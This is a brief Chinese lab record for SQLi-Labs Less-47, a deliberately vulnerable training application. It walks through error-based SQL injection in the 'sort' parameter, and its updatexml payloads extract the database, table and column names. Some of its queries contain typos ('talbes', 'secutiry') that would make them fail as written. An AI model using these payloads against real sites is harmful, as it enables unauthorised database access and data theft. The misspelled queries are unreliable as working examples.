SQLI-LAPS 实验记录
Less-47
这一关与之前的关卡类似,只是闭合的方式不同。
首先我们在Password这一点输入Payload如下:
sql
?sort=1
结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。
之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。
php
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+
结果如图所示,返回了数据库名。
后续爆出数据库的表名、列名等方式如下:
- 爆出表名:
php
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+- 爆出列名:
php
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+